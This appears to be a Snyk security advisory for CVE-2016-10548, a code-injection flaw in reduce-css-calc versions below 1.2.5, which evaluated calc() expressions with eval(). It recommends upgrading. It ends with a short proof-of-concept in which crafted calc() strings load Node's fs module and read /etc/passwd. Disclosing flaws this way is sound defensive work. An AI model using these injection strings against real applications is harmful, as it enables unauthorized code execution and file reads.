<p>Upgrade <code>reduce-css-calc</code> version 1.2.5 or greater.</p>

Arbitrary Code Injection Affecting reduce-css-calc package, versions <1.2.5

Snyk CVSS

Attack Complexity Low

User Interaction Required

Scope Changed

Threat Intelligence

EPSS 0.19% (56^th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk ID npm:reduce-css-calc:20160913
published 17 Oct 2016
disclosed 20 Aug 2016
credit Сковорода Никита Андреевич (ChALkeR)

Report a new vulnerability Found a mistake?

Introduced: 20 Aug 2016

CVE-2016-10548 Open this link in a new tab CWE-94 Open this link in a new tab

How to fix?

Upgrade reduce-css-calc version 1.2.5 or greater.

Overview

reduce-css-calc is a package that reduces CSS calc() function to the maximum. Affected versions of the package used eval() for evaluation the expression, allowing the attacker to gain arbitrary code execution via specially crafted input.

Example

The issue was reported by ChALkeR and demonstrated by his example below:

const reduceCSSCalc = require('reduce-css-calc');
console.log(reduceCSSCalc(`calc(                       (Buffer(10000)))`));
console.log(reduceCSSCalc(`calc(                       (global['fs'] = require('fs')))`));
console.log(reduceCSSCalc(`calc(                       (fs['readFileSync']("/etc/passwd", "utf-8")))`));